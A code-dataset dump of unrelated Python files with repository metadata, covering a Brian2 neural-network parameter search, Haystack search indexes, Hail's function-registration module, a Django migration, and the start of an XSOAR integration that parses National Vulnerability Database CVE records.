G_inh.g = '0'
G_readout.g = '0'
G_ex.h = '0'
G_inh.h = '0'
G_readout.h = '0'
G_ex.tau = tau_ex
G_inh.tau = tau_inh
G_readout.tau = tau_read
[G_ex,G_in] = base.allocate([G_ex,G_inh],5,5,20)
# -------initialization of network topology and synapses parameters----------
S_inE.connect(condition='j<0.3*N_post', p = p_inE)
S_inI.connect(condition='j<0.3*N_post', p = p_inI)
S_EE.connect(condition='i != j', p='0.3*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_EI.connect(p='0.2*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_IE.connect(p='0.4*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_II.connect(condition='i != j', p='0.1*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_E_readout.connect(j='i')
S_I_readout.connect(j='i+n_ex')
S_inE.w = function.gamma(A_inE, S_inE.w.shape)
S_inI.w = function.gamma(A_inI, S_inI.w.shape)
S_EE.w = function.gamma(A_EE, S_EE.w.shape)
S_IE.w = function.gamma(A_IE, S_IE.w.shape)
S_EI.w = function.gamma(A_EI, S_EI.w.shape)
S_II.w = function.gamma(A_II, S_II.w.shape)
S_EE.pre.delay = '1.5*ms'
S_EI.pre.delay = '0.8*ms'
S_IE.pre.delay = '0.8*ms'
S_II.pre.delay = '0.8*ms'
# ------create network-------------
net = Network(collect())
net.store('init')
# ------run network-------------
stimulus = TimedArray(inputs[0], dt=Dt)
duration = inputs[0].shape[0]
net.run(duration * Dt)
states = net.get_states()['neurongroup_read']['v']
net.restore('init')
return (states, inputs[1])
def parameters_search(**parameter):
# ------parallel run for train-------
states_train_list = pool.map(partial(run_net, **parameter), [(x) for x in zip(data_train_s, label_train)])
# ----parallel run for test--------
states_test_list = pool.map(partial(run_net, **parameter), [(x) for x in zip(data_test_s, label_test)])
# ------Readout---------------
states_train, states_test, _label_train, _label_test = [], [], [], []
for train in states_train_list :
states_train.append(train[0])
_label_train.append(train[1])
for test in states_test_list:
states_test.append(test[0])
_label_test.append(test[1])
states_train = (MinMaxScaler().fit_transform(np.asarray(states_train))).T
states_test = (MinMaxScaler().fit_transform(np.asarray(states_test))).T
score_train, score_test = readout.readout_sk(states_train, states_test,
np.asarray(_label_train), np.asarray(_label_test),
solver="lbfgs", multi_class="multinomial")
# ----------show results-----------
print('parameters %s' % parameter)
print('Train score: ', score_train)
print('Test score: ', score_test)
return score_test
##########################################
# -------BO parameters search---------------
if __name__ == '__main__':
core = 10
pool = Pool(core)
optimizer = bayes_opt.BayesianOptimization(
f=parameters_search,
pbounds={'R': (0.01, 2), 'f': (0.01, 2), 'tau':(0.01, 2)},
verbose=2,
random_state=np.random.RandomState(),
)
# from bayes_opt.util import load_logs
# load_logs(optimizer, logs=["./BO_res_Jv.json"])
logger = bayes_opt.observer.JSONLogger(path="./BO_res_Jv.json")
optimizer.subscribe(bayes_opt.event.Events.OPTMIZATION_STEP, logger)
optimizer.maximize(
init_points=10,
n_iter=200,
acq='ucb',
kappa=2.576,
xi=0.0,
) | [
"[email protected]"
] | |
02de053f7a35ad14f7c9469e279ff827159d5414 | 904bf81488ce47c93453a8a841403e831f03ebe0 | /tx_lobbying/search_indexes.py | edb9f8e6255ec97382048159f312a5a1398c6c77 | [
"Apache-2.0"
] | permissive | texastribune/tx_lobbying | b7b26ed8acb6059f46bf1e4285af69398795b074 | 81dd911667e5368b874a56d5fba8e1613f7027ee | refs/heads/master | 2020-04-01T09:25:11.457807 | 2015-05-19T03:34:53 | 2015-05-19T03:34:53 | 7,674,962 | 1 | 3 | null | 2015-05-28T03:08:54 | 2013-01-17T21:47:06 | Python | UTF-8 | Python | false | false | 920 | py | """
Haystack search indicies.
I denormalize thing here to try and make things easier on the database later.
"""
from haystack import indexes
from .models import Lobbyist, Interest
class LobbyistIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
content_auto = indexes.EdgeNgramField(model_attr='name')
url = indexes.CharField()
def get_model(self):
return Lobbyist
def get_updated_field(self):
return 'updated_at'
def prepare_url(self, obj):
return obj.get_absolute_url()
class InterestIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
content_auto = indexes.EdgeNgramField(model_attr='name')
url = indexes.CharField()
def get_model(self):
return Interest
def prepare_url(self, obj):
return obj.get_absolute_url()
| [
"[email protected]"
] | |
a283425bbb4f90949b0edfcd5f68564d3833b84f | 050d5f569497b8e04272b2b6955ac6f844e094e7 | /hail/python/hail/ir/register_functions.py | 814b1dbcbd0074c87fe410eb5acaeab94fbd9ce5 | [
"MIT"
] | permissive | steveherrin/hail | a68460870aa8207de628ee2054a7af889ef8e07c | edd724faf9443d37cca6a22d4c0a2af939130427 | refs/heads/master | 2020-07-29T14:03:50.642849 | 2019-09-20T16:11:21 | 2019-09-20T16:11:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,551 | py | import hail as hl
from hail.expr.nat import NatVariable
from .ir import register_function, register_session_function, register_seeded_function
def register_reference_genome_functions(rg):
from hail.expr.types import dtype
register_session_function(f"isValidContig({rg})", (dtype("str"),), dtype("bool"))
register_session_function(f"isValidLocus({rg})", (dtype("str"),dtype("int32"),), dtype("bool"))
register_session_function(f"getReferenceSequenceFromValidLocus({rg})", (dtype("str"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("str"))
register_session_function(f"getReferenceSequence({rg})", (dtype("str"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("str"))
def register_functions():
from hail.expr.types import dtype
register_function("flatten", (dtype("array<array<?T>>"),), dtype("array<?T>"))
register_function("difference", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>"))
register_function("median", (dtype("set<?T:numeric>"),), dtype("?T"))
register_function("median", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("uniqueMinIndex", (dtype("array<?T>"),), dtype("int32"))
register_function("mean", (dtype("array<?T:numeric>"),), dtype("float64"))
register_function("toFloat32", (dtype("?T:numeric"),), dtype("float32"))
register_function("uniqueMaxIndex", (dtype("array<?T>"),), dtype("int32"))
register_function("toSet", (dtype("array<?T>"),), dtype("set<?T>"))
def array_floating_point_divide(arg_type, ret_type):
register_function("/", (arg_type, hl.tarray(arg_type),), hl.tarray(ret_type))
register_function("/", (hl.tarray(arg_type),arg_type), hl.tarray(ret_type))
register_function("/", (hl.tarray(arg_type),hl.tarray(arg_type)), hl.tarray(ret_type))
array_floating_point_divide(hl.tint32, hl.tfloat32)
array_floating_point_divide(hl.tint64, hl.tfloat32)
array_floating_point_divide(hl.tfloat32, hl.tfloat32)
array_floating_point_divide(hl.tfloat64, hl.tfloat64)
def ndarray_floating_point_divide(arg_type, ret_type):
register_function("/", (arg_type, hl.tndarray(arg_type, NatVariable()),), hl.tndarray(ret_type, NatVariable()))
register_function("/", (hl.tndarray(arg_type, NatVariable()), arg_type), hl.tndarray(ret_type, NatVariable()))
register_function("/", (hl.tndarray(arg_type, NatVariable()),
hl.tndarray(arg_type, NatVariable())), hl.tndarray(ret_type, NatVariable()))
ndarray_floating_point_divide(hl.tint32, hl.tfloat32)
ndarray_floating_point_divide(hl.tint64, hl.tfloat32)
ndarray_floating_point_divide(hl.tfloat32, hl.tfloat32)
ndarray_floating_point_divide(hl.tfloat64, hl.tfloat64)
register_function("values", (dtype("dict<?key, ?value>"),), dtype("array<?value>"))
register_function("[*:]", (dtype("array<?T>"),dtype("int32"),), dtype("array<?T>"))
register_function("[*:]", (dtype("str"),dtype("int32"),), dtype("str"))
register_function("get", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("?value"))
register_function("get", (dtype("dict<?key, ?value>"),dtype("?key"),dtype("?value"),), dtype("?value"))
register_function("max", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("nanmax", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("max", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmax", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("max_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmax_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("product", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("toInt32", (dtype("?T:numeric"),), dtype("int32"))
register_function("extend", (dtype("array<?T>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("argmin", (dtype("array<?T>"),), dtype("int32"))
register_function("toFloat64", (dtype("?T:numeric"),), dtype("float64"))
register_function("sort", (dtype("array<?T>"),), dtype("array<?T>"))
register_function("sort", (dtype("array<?T>"),dtype("bool"),), dtype("array<?T>"))
register_function("isSubset", (dtype("set<?T>"),dtype("set<?T>"),), dtype("bool"))
register_function("[*:*]", (dtype("str"),dtype("int32"),dtype("int32"),), dtype("str"))
register_function("[*:*]", (dtype("array<?T>"),dtype("int32"),dtype("int32"),), dtype("array<?T>"))
register_function("+", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("+", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("+", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("+", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("+", (dtype("ndarray<?T:numeric, ?nat>"), dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("+", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("**", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<float64>"))
register_function("**", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<float64>"))
register_function("**", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<float64>"))
register_function("**", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("**", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("**", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("append", (dtype("array<?T>"),dtype("?T"),), dtype("array<?T>"))
register_function("[:*]", (dtype("str"),dtype("int32"),), dtype("str"))
register_function("[:*]", (dtype("array<?T>"),dtype("int32"),), dtype("array<?T>"))
register_function("remove", (dtype("set<?T>"),dtype("?T"),), dtype("set<?T>"))
register_function("[]", (dtype("str"),dtype("int32"),), dtype("str"))
register_function("indexArray", (dtype("array<?T>"),dtype("int32"),), dtype("?T"))
register_function("[]", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("?value"))
register_function("dictToArray", (dtype("dict<?key, ?value>"),), dtype("array<tuple(?key, ?value)>"))
register_function("%", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("%", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("%", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("%", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("%", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("%", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("dict", (dtype("array<tuple(?key, ?value)>"),), dtype("dict<?key, ?value>"))
register_function("dict", (dtype("set<tuple(?key, ?value)>"),), dtype("dict<?key, ?value>"))
register_function("keys", (dtype("dict<?key, ?value>"),), dtype("array<?key>"))
register_function("min", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("nanmin", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("min", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmin", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("min_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmin_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("sum", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("toInt64", (dtype("?T:numeric"),), dtype("int64"))
register_function("contains", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("bool"))
register_function("contains", (dtype("array<?T>"),dtype("?T"),), dtype("bool"))
register_function("contains", (dtype("set<?T>"),dtype("?T"),), dtype("bool"))
register_function("-", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("-", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("-", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("-", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("-", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("-", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("addone", (dtype("int32"),), dtype("int32"))
register_function("isEmpty", (dtype("dict<?key, ?value>"),), dtype("bool"))
register_function("isEmpty", (dtype("array<?T>"),), dtype("bool"))
register_function("isEmpty", (dtype("set<?T>"),), dtype("bool"))
register_function("[:]", (dtype("array<?T>"),), dtype("array<?T>"))
register_function("[:]", (dtype("str"),), dtype("str"))
register_function("union", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>"))
register_function("*", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("*", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("*", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("*", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("*", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("*", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("intersection", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>"))
register_function("add", (dtype("set<?T>"),dtype("?T"),), dtype("set<?T>"))
register_function("argmax", (dtype("array<?T>"),), dtype("int32"))
register_function("//", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("//", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("//", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("//", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("//", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("//", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("keySet", (dtype("dict<?key, ?value>"),), dtype("set<?key>"))
register_function("qnorm", (dtype("float64"),), dtype("float64"))
register_function("oneHotAlleles", (dtype("call"),dtype("int32"),), dtype("array<int32>"))
register_function("dpois", (dtype("float64"),dtype("float64"),dtype("bool"),), dtype("float64"))
register_function("dpois", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("ploidy", (dtype("call"),), dtype("int32"))
register_function("||", (dtype("bool"),dtype("bool"),), dtype("bool"))
register_function("ppois", (dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("float64"))
register_function("ppois", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("log10", (dtype("float64"),), dtype("float64"))
register_function("isHet", (dtype("call"),), dtype("bool"))
register_function("isAutosomalOrPseudoAutosomal", (dtype("?T:locus"),), dtype("bool"))
register_function("testCodeUnification", (dtype("?x:numeric"),dtype("?x:int32"),), dtype("?x"))
register_seeded_function("rand_pois", (dtype("float64"),), dtype("float64"))
register_seeded_function("rand_pois", (dtype("int32"),dtype("float64"),), dtype("array<float64>"))
register_function("toFloat32", (dtype("str"),), dtype("float32"))
register_function("toFloat32", (dtype("bool"),), dtype("float32"))
register_function("isAutosomal", (dtype("?T:locus"),), dtype("bool"))
register_function("isPhased", (dtype("call"),), dtype("bool"))
register_function("isHomVar", (dtype("call"),), dtype("bool"))
register_function("corr", (dtype("array<float64>"),dtype("array<float64>"),), dtype("float64"))
register_function("log", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("log", (dtype("float64"),), dtype("float64"))
register_function("foobar2", (), dtype("int32"))
register_function("approxEqual", (dtype("float64"),dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("bool"))
register_function("plDosage", (dtype("array<?N:int32>"),), dtype("float64"))
register_function("includesEnd", (dtype("interval<?T>"),), dtype("bool"))
register_function("position", (dtype("?T:locus"),), dtype("int32"))
register_seeded_function("rand_unif", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("str", (dtype("?T"),), dtype("str"))
register_function("valuesSimilar", (dtype("?T"),dtype("?T"),dtype('float64'),dtype('bool'),), dtype("bool"))
register_function("replace", (dtype("str"),dtype("str"),dtype("str"),), dtype("str"))
register_function("exp", (dtype("float64"),), dtype("float64"))
register_function("&&", (dtype("bool"),dtype("bool"),), dtype("bool"))
register_function("compare", (dtype("int32"),dtype("int32"),), dtype("int32"))
register_function("triangle", (dtype("int32"),), dtype("int32"))
register_function("Interval", (dtype("?T"),dtype("?T"),dtype("bool"),dtype("bool"),), dtype("interval<?T>"))
register_function("contig", (dtype("?T:locus"),), dtype("str"))
register_function("Call", (dtype("bool"),), dtype("call"))
register_function("Call", (dtype("str"),), dtype("call"))
register_function("Call", (dtype("int32"),dtype("bool"),), dtype("call"))
register_function("Call", (dtype("int32"),dtype("int32"),dtype("bool"),), dtype("call"))
register_function("Call", (dtype("array<int32>"),dtype("bool"),), dtype("call"))
register_function("qchisqtail", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("binomTest", (dtype("int32"),dtype("int32"),dtype("float64"),dtype("int32"),), dtype("float64"))
register_function("qpois", (dtype("float64"),dtype("float64"),), dtype("int32"))
register_function("qpois", (dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("int32"))
register_function("is_finite", (dtype("float32"),), dtype("bool"))
register_function("is_finite", (dtype("float64"),), dtype("bool"))
register_function("inYPar", (dtype("?T:locus"),), dtype("bool"))
register_function("contingency_table_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64}"))
register_function("toInt32", (dtype("bool"),), dtype("int32"))
register_function("toInt32", (dtype("str"),), dtype("int32"))
register_function("foobar1", (), dtype("int32"))
register_function("toFloat64", (dtype("str"),), dtype("float64"))
register_function("toFloat64", (dtype("bool"),), dtype("float64"))
register_function("dbeta", (dtype("float64"),dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("Locus", (dtype("str"),), dtype("?T:locus"))
register_function("Locus", (dtype("str"), dtype("int32"),), dtype("?T:locus"))
register_function("LocusAlleles", (dtype("str"),), dtype("struct{locus: ?T, alleles: array<str>}"))
register_function("LocusInterval", (dtype("str"),dtype("bool"),), dtype("interval<?T:locus>"))
register_function("LocusInterval", (dtype("str"),dtype("int32"),dtype("int32"),dtype("bool"),dtype("bool"),dtype("bool"),), dtype("interval<?T:locus>"))
register_function("globalPosToLocus", (dtype("int64"),), dtype("?T:locus"))
register_function("locusToGlobalPos", (dtype("?T:locus"),), dtype("int64"))
register_function("liftoverLocus", (dtype(f"?T:locus"), dtype('float64'),), dtype(f"struct{{result:?U:locus,is_negative_strand:bool}}"))
register_function("liftoverLocusInterval", (dtype(f"interval<?T:locus>"), dtype('float64'),), dtype(f"struct{{result:interval<?U:locus>,is_negative_strand:bool}}"))
register_function("min_rep", (dtype("?T:locus"),dtype("array<str>"),), dtype("struct{locus: ?T, alleles: array<str>}"))
register_function("locus_windows_per_contig", (dtype("array<array<float64>>"),dtype("float64"),), dtype("tuple(array<int32>, array<int32>)"))
register_function("toBoolean", (dtype("str"),), dtype("bool"))
register_seeded_function("rand_bool", (dtype("float64"),), dtype("bool"))
register_function("pchisqtail", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_seeded_function("rand_cat", (dtype("array<float64>"),), dtype("int32"))
register_function("inYNonPar", (dtype("?T:locus"),), dtype("bool"))
register_function("+", (dtype("str"),dtype("str"),), dtype("str"))
register_function("**", (dtype("float32"),dtype("float32"),), dtype("float64"))
register_function("**", (dtype("int32"),dtype("int32"),), dtype("float64"))
register_function("**", (dtype("int64"),dtype("int64"),), dtype("float64"))
register_function("**", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("length", (dtype("str"),), dtype("int32"))
register_function("slice", (dtype("str"),dtype("int32"),dtype("int32"),), dtype("str"))
register_function("split", (dtype("str"),dtype("str"),dtype("int32"),), dtype("array<str>"))
register_function("split", (dtype("str"),dtype("str"),), dtype("array<str>"))
register_seeded_function("rand_gamma", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("UnphasedDiploidGtIndexCall", (dtype("int32"),), dtype("call"))
register_function("[]", (dtype("call"),dtype("int32"),), dtype("int32"))
register_function("sign", (dtype("int64"),), dtype("int64"))
register_function("sign", (dtype("float64"),), dtype("float64"))
register_function("sign", (dtype("float32"),), dtype("float32"))
register_function("sign", (dtype("int32"),), dtype("int32"))
register_function("unphasedDiploidGtIndex", (dtype("call"),), dtype("int32"))
register_function("gamma", (dtype("float64"),), dtype("float64"))
register_function("%", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("%", (dtype("int64"),dtype("int64"),), dtype("int64"))
register_function("%", (dtype("float32"),dtype("float32"),), dtype("float32"))
register_function("%", (dtype("int32"),dtype("int32"),), dtype("int32"))
register_function("fisher_exact_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64, ci_95_lower: float64, ci_95_upper: float64}"))
register_function("floor", (dtype("float64"),), dtype("float64"))
register_function("floor", (dtype("float32"),), dtype("float32"))
register_function("isNonRef", (dtype("call"),), dtype("bool"))
register_function("includesStart", (dtype("interval<?T>"),), dtype("bool"))
register_function("isHetNonRef", (dtype("call"),), dtype("bool"))
register_function("hardy_weinberg_test", (dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{het_freq_hwe: float64, p_value: float64}"))
register_function("haplotype_freq_em", (dtype("array<int32>"),), dtype("array<float64>"))
register_function("nNonRefAlleles", (dtype("call"),), dtype("int32"))
register_function("abs", (dtype("float64"),), dtype("float64"))
register_function("abs", (dtype("float32"),), dtype("float32"))
register_function("abs", (dtype("int64"),), dtype("int64"))
register_function("abs", (dtype("int32"),), dtype("int32"))
register_function("endswith", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("sqrt", (dtype("float64"),), dtype("float64"))
register_function("isnan", (dtype("float32"),), dtype("bool"))
register_function("isnan", (dtype("float64"),), dtype("bool"))
register_function("lower", (dtype("str"),), dtype("str"))
register_seeded_function("rand_beta", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_seeded_function("rand_beta", (dtype("float64"),dtype("float64"),dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("toInt64", (dtype("bool"),), dtype("int64"))
register_function("toInt64", (dtype("str"),), dtype("int64"))
register_function("testCodeUnification2", (dtype("?x"),), dtype("?x"))
register_function("contains", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("contains", (dtype("interval<?T>"),dtype("?T"),), dtype("bool"))
register_function("entropy", (dtype("str"),), dtype("float64"))
register_function("filtering_allele_frequency", (dtype("int32"),dtype("int32"),dtype("float64"),), dtype("float64"))
register_function("gqFromPL", (dtype("array<?N:int32>"),), dtype("int32"))
register_function("startswith", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("ceil", (dtype("float32"),), dtype("float32"))
register_function("ceil", (dtype("float64"),), dtype("float64"))
register_function("json", (dtype("?T"),), dtype("str"))
register_function("strip", (dtype("str"),), dtype("str"))
register_function("firstMatchIn", (dtype("str"),dtype("str"),), dtype("array<str>"))
register_function("isEmpty", (dtype("interval<?T>"),), dtype("bool"))
register_function("~", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("mkString", (dtype("set<str>"),dtype("str"),), dtype("str"))
register_function("mkString", (dtype("array<str>"),dtype("str"),), dtype("str"))
register_function("dosage", (dtype("array<?N:float64>"),), dtype("float64"))
register_function("upper", (dtype("str"),), dtype("str"))
register_function("overlaps", (dtype("interval<?T>"),dtype("interval<?T>"),), dtype("bool"))
register_function("downcode", (dtype("call"),dtype("int32"),), dtype("call"))
register_function("inXPar", (dtype("?T:locus"),), dtype("bool"))
register_function("format", (dtype("str"),dtype("?T:tuple"),), dtype("str"))
register_function("pnorm", (dtype("float64"),), dtype("float64"))
register_function("is_infinite", (dtype("float32"),), dtype("bool"))
register_function("is_infinite", (dtype("float64"),), dtype("bool"))
register_function("isHetRef", (dtype("call"),), dtype("bool"))
register_function("isMitochondrial", (dtype("?T:locus"),), dtype("bool"))
register_function("hamming", (dtype("str"),dtype("str"),), dtype("int32"))
register_function("end", (dtype("interval<?T>"),), dtype("?T"))
register_function("start", (dtype("interval<?T>"),), dtype("?T"))
register_function("inXNonPar", (dtype("?T:locus"),), dtype("bool"))
register_function("escapeString", (dtype("str"),), dtype("str"))
register_function("isHomRef", (dtype("call"),), dtype("bool"))
register_seeded_function("rand_norm", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("chi_squared_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64}"))
| [
"[email protected]"
] | |
3dab6d251c6ac13c212ea60b449bf66fc68e4008 | 48d86947d5f3b5896c4a05cfcddcff01582a26ef | /amnesia/task/migrations/0002_auto_20170504_2027.py | 1792df7727f51e01362639cf36de2a20b7de1620 | [] | no_license | pratulyab/amnesia | 181874288c97fbf7e73d10c64e214c2a17574773 | 6b0b3428a27f98e0e2f6bb8aefdc8a4459e7b8cc | refs/heads/master | 2021-01-20T12:49:16.592335 | 2017-05-07T20:38:06 | 2017-05-07T20:38:06 | 90,409,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-05-04 20:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('task', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='task',
name='every',
field=models.CharField(choices=[('15', '15 minutes'), ('30', '30 minutes'), ('45', '45 minutes'), ('0', '60 minutes')], default='0', help_text='Repeat every', max_length=2),
),
migrations.AlterField(
model_name='task',
name='sleep_cycle',
field=models.CharField(choices=[('4-19', '8pm - 4am'), ('5-20', '9pm - 5am'), ('6-21', '10pm - 6am'), ('7-22', '11pm - 7am'), ('8-23', '12pm - 8am')], default='4-19', help_text='Assuming 8 hours sleep cycle', max_length=5),
),
]
| [
"[email protected]"
] | |
d0c7559b7165c2f244c313b57474e26053f26554 | 2a1b8a671aceda6bc446f8ce26400aa84fa444a6 | /Packs/NationalVulnerabilityDatabaseFeed/Integrations/NationalVulnerabilityDatabaseFeed/NationalVulnerabilityDatabaseFeed.py | daa1e14306dcea7f4df316bec273e24e3104e8bc | [
"MIT"
] | permissive | demisto/content | 6d4722d46f0ff0beea2748e9f7de585bf91a78b4 | 890def5a0e0ae8d6eaa538148249ddbc851dbb6b | refs/heads/master | 2023-09-04T00:02:25.618032 | 2023-09-03T21:56:22 | 2023-09-03T21:56:22 | 60,525,392 | 1,023 | 1,921 | MIT | 2023-09-14T20:55:24 | 2016-06-06T12:17:02 | Python | UTF-8 | Python | false | false | 12,285 | py | import demistomock as demisto
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
from CommonServerUserPython import * # noqa
from typing import Dict, Any, List
from datetime import datetime, timedelta
from time import sleep
import urllib3
# Disable insecure warnings
urllib3.disable_warnings() # pylint: disable=no-member
''' CONSTANTS '''
DATE_FORMAT = "%Y-%m-%dT%H:%M:%S:000 UTC-00:00" # ISO8601 format with UTC, default in XSOAR
DEFAULT_LIMIT = 100
# =========================================== Helper Functions ===========================================#
def parse_cve_data(item=None) -> dict:
fields = dict()
if item and isinstance(item, dict):
# Populate common fields
cve: dict = item.get('cve') # type: ignore
# Description
if "description" in cve:
description = cve.get('description', {}).get('description_data')
if "en" in [x.get('lang') for x in description]:
fields['cvedescription'] = description[([x.get('lang') for x in description]).index('en')].get('value')
# References
if "references" in cve:
references: List = cve.get('references', {}).get('reference_data')
fields['publications'] = [
{
"link": x.get('url'),
"title": x.get('name'),
"source": x.get('refsource')
} for x in references]
# Parse impact data
impact = item.get('impact')
if impact:
# All CVSS data
all_cvss = []
# Base Metric V2
if "impact" in impact:
impact_v2 = impact.get('impact')
if "baseMetricV2" in impact_v2:
base_metric_v2 = impact_v2.get('baseMetricV2')
if "cvssV2" in base_metric_v2:
cvss_v2 = base_metric_v2.get('cvssV2')
all_cvss.append({"cvssV2": cvss_v2})
# Base Metric V3
if "baseMetricV3" in impact:
base_metric = impact.get('baseMetricV3')
if "cvssV3" in base_metric:
cvss_v3 = base_metric.get('cvssV3')
all_cvss.append({"cvssV3": cvss_v3})
cvss_v3_data = []
for k, v in cvss_v3.items():
cvss_v3_data.append(
{
"metric": camel_case_to_underscore(k).replace("_", " ").title(),
"values": v
}
)
